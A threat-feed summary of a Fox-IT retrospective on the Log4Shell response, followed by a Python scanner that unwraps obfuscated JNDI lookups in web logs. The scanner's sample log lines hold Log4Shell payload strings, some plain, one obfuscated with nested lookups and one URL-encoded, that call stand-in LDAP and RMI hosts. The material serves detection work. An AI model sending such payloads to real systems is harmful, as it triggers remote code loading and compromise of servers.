
One Year Since Log4Shell: Lessons Learned for the next ‘code red’

ID: f5eae58a-39b8-5c52-83da-df188ff49851

STIX ID: report--f5eae58a-39b8-5c52-83da-df188ff49851

Feed Name: Fox-IT blog

Threat Score
80/100

Date Published: 2022-12-12

Date Updated: 2026-04-27

...
...

This Fox-IT / NCC Group retrospective describes how their SOC and CIRT responded to the Log4Shell (CVE-2021-44228) 'code red'. It details the timeline of the first 72 hours; the rapid development and deployment of detection, including Suricata rules and IOC harvesting; emergency threat-hunting procedures; and the publication of IOCs and tools. A year-long review of the resulting incident-response cases observed ransomware, coinminers and APT-related espionage. The lessons the report draws are to pursue quick wins, detect in real time, segment networks, patch promptly and push for clearer vendor communication.
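The summary above mentions rapid detection engineering for Log4Shell but does not show what such a check has to cope with. The following is an added example, not Fox-IT's or NCC Group's own Suricata rules or tooling: a log scanner that unwraps the nested-lookup obfuscation attackers used to hide `${jndi:...}` (`${lower:j}`, `${::-j}`, `${env:X:-j}`, URL encoding) before matching, and reports the JNDI scheme and callback host per line. The access-log lines are constructed for this example and use RFC 5737 documentation addresses; the set of lookup forms it resolves covers the common obfuscations, not every Log4j lookup.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup strings in web-server log lines.

Added example (not part of the Fox-IT blog post). Resolves the nested-lookup
obfuscation seen in the wild before matching, so that
'${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://...}' is caught as well as
the plain '${jndi:ldap://...}'.
"""
import re
from typing import List, NamedTuple
from urllib.parse import unquote

# Innermost ${...} lookup: no nested '${' and no '}' inside the braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI reference with its URL scheme and callback host, matched after normalisation.
_JNDI = re.compile(r"jndi:([a-z]+):/*([^/\s}]+)", re.IGNORECASE)


class Hit(NamedTuple):
    line_no: int
    scheme: str   # ldap, ldaps, rmi, dns, iiop, ...
    host: str     # callback host[:port] the victim would be made to contact


def _resolve(match: "re.Match[str]") -> str:
    """Replace one innermost lookup by the literal text it evaluates to."""
    body = match.group(1)
    head = body.lower()
    if head.startswith("jndi:"):
        return match.group(0)             # this is the lookup we want to see; keep it
    if ":-" in body:                      # ${env:NOPE:-j}, ${::-j}: the default value wins
        return body.split(":-", 1)[1]
    if head.startswith("lower:"):
        return body[6:].lower()
    if head.startswith("upper:"):
        return body[6:].upper()
    if head.startswith("date:"):          # ${date:'j'} yields the quoted literal
        return body[5:].strip("'\"")
    return match.group(0)                 # unknown lookup (e.g. ${sys:...}): leave untouched


def normalize(text: str) -> str:
    """URL-decode and collapse nested lookups from the inside out until nothing changes."""
    while True:
        new = _INNER_LOOKUP.sub(_resolve, unquote(text))
        if new == text:
            return text
        text = new


def scan_log(lines: List[str]) -> List[Hit]:
    """Return one Hit per line that carries a JNDI lookup after normalisation."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append(Hit(n, m.group(1).lower(), m.group(2)))
    return hits


# Constructed sample access-log lines (not real traffic); hosts are RFC 5737 addresses.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:13:01:07 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 1234 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:13:01:12 +0000] "GET /?x=${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:l}dap://203.0.113.9/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:13:01:15 +0000] "GET / HTTP/1.1" 200 1234 "-" "%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%3A1099%2Fobj%7D"',
    '203.0.113.6 - - [10/Dec/2021:13:01:20 +0000] "GET / HTTP/1.1" 200 1234 "-" "${sys:java.version}"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: jndi via {hit.scheme} -> {hit.host}")
```

Matching only on the literal `${jndi:` would miss lines 3 and 4 above; normalising first is what makes a single pattern sufficient. The unresolved `${sys:java.version}` on line 5 is deliberately not reported by this check, although any lookup string in a User-Agent is itself worth a hunt. Only the first JNDI reference per line is reported, and every hit still needs confirmation from outbound LDAP/RMI connections or the class-loading that follows, which is where network detection such as the Suricata rules mentioned in the summary earns its place.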
